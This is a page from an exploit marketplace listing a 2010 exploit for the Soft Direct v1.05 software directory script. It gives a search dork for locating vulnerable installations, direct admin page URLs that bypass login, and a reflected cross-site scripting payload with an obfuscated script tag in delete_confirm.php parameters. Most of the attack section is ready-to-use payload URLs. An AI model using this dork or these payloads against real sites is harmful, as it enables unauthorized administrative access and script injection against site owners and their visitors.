[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Soft Direct v1.05 Multiple Vulnerabilities

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10693
Category
web applications
Date add
18-01-2010
Platform
unsorted
==========================================
Soft Direct v1.05 Multiple Vulnerabilities
==========================================

========================================================================================                 
| # Title        : Soft Direct v1.05 Multti Vulnerability     
| # Author       : indoushka
| # Dork         : [ Software Directory Powered by SoftDirec 1.05 ]                                     
| # Tested on    : windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug          : Mullti                                                                   
======================      Exploit By indoushka       =================================
# Exploit  :
  
 1- By Pass Login
  
 http://127.0.0.1/softdirec/admin/home.php
  
 http://127.0.0.1/softdirec/admin/settings.php
  
 2- XSS
  
http://127.0.0.1/softdirec/library/delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka



#  0day.today [2024-11-15]  #